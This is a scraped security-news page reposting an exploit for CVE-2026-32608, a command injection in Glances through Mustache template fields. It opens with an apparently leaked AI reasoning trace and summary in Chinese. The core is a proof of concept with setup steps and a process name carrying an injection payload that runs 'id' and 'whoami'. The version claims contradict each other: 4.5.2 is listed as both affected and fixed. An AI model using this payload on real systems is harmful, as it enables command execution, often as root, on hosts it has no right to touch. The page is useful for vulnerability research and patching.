嗯,用户让我总结一篇文章的内容,控制在100字以内,而且不需要特定的开头。我得先仔细阅读文章内容。 文章标题是Glances <= 4.5.2 通过Mustache模板字段的OS命令注入。看起来这是一个安全漏洞。作者是Mohammed Idrees Banyamer,来自约旦。漏洞影响Glances版本4.5.2及以下,CVE编号是CVE-2026-32608。 描述部分提到Glances在处理用户控制的值时存在不安全的情况,比如进程名、容器名等,在Mustache模板中使用这些值会导致命令注入。攻击者可以利用这些字段注入任意系统命令。 漏洞影响平台包括Linux、macOS和Windows,前提是Glances在这些系统上运行。修复版本是4.5.2,CVSS评分7.0,属于高危。 总结的时候要包括:Glances的版本、漏洞类型、利用方式、影响范围和修复情况。控制在100字以内,所以需要简洁明了。 可能会写成:“Glances <=4.5.2版本存在通过Mustache模板字段进行OS命令注入的漏洞(CVE-2026-32608)。攻击者可利用进程名等字段注入恶意命令,影响Linux/macOS/Windows平台。已修复于4.5.2版本。” 这样既涵盖了关键点,又符合字数要求。 </think> Glances <=4.5.2版本存在通过Mustache模板字段进行OS命令注入的漏洞(CVE-2026-32608)。攻击者可利用进程名等字段注入恶意命令,影响Linux/macOS/Windows平台。已修复于4.5.2版本。 2026-3-18 21:17:22 Author: cxsecurity.com(查看原文) 阅读量:4 收藏
Glances <= 4.5.2 OS Command Injection via Mustache Template Fields
#!/usr/bin/env python3 # Exploit Title: Glances <= 4.5.2 OS Command Injection via Mustache Template Fields # CVE: CVE-2026-32608 # Date: 2026-03-18 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: https://github.com/mbanyamer # Vendor Homepage: https://github.com/nicolargo/glances # Software Link: https://pypi.org/project/glances/ # Affected: Glances <= 4.5.2-dev01 (pip / source installs) # Tested on: Glances 4.5.1 # Category: Remote # Platform: Linux / macOS / Windows (where Glances runs) # Exploit Type: Command Injection # CVSS: 7.0 (High) # Description: Glances insecurely processes user-controlled values (process names, container names, mount points) in Mustache templates used in action commands. Malicious entity names can inject arbitrary OS commands via | && > separators before secure_popen splitting logic. # Fixed in: Glances 4.5.2 (commit 6f4ec53d967478e69917078e6f73f448001bf107) # Usage: # python3 exploit.py # # Examples: # python3 exploit.py # # Options: # -- (no command-line options implemented in this minimal PoC) # # Notes: # • Requires Glances to be running with a config containing action commands using {{name}}, {{container_name}} etc. # • Attacker must be able to create/rename processes or Docker containers on the target system. # • Executes commands as the user running Glances (often root when run as service) # # How to Use # # Step 1: # Install vulnerable version: pip install "glances<4.5.2" # # Step 2: # Create glances.conf with e.g.: # [processlist] # critical_action=echo "ALERT: {{name}}" >> /tmp/alert.log # # Step 3: # Run Glances: glances --config glances.conf # # Step 4: # Create malicious process: # cp /bin/sleep "/tmp/ok|id>/tmp/pwned;whoami>>/tmp/pwned||" # "/tmp/ok|id>/tmp/pwned;whoami>>/tmp/pwned||" 999 & # # Step 5: # Wait for Glances to evaluate process list and trigger action import subprocess import shlex def vulnerable_secure_popen(cmd: str): for sep in ("&&", "|", ">"): cmd = cmd.replace(sep, f" {sep} ") parts = [p.strip() for p in cmd.split() if p.strip()] for part in parts: print(f"[EXEC] {part}") malicious_name = 'innocent|id>/tmp/pwned;whoami>>/tmp/pwned||' template = 'echo "ALERT: {{name}} used 99% CPU" >> /tmp/alerts.log' rendered = template.replace('{{name}}', malicious_name) print("Rendered command:", rendered) vulnerable_secure_popen(rendered)
Thanks for you comment!
Your message is in quarantine 48 hours.
{{ x.nick }}
{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |
如有侵权请联系:admin#unsafe.sh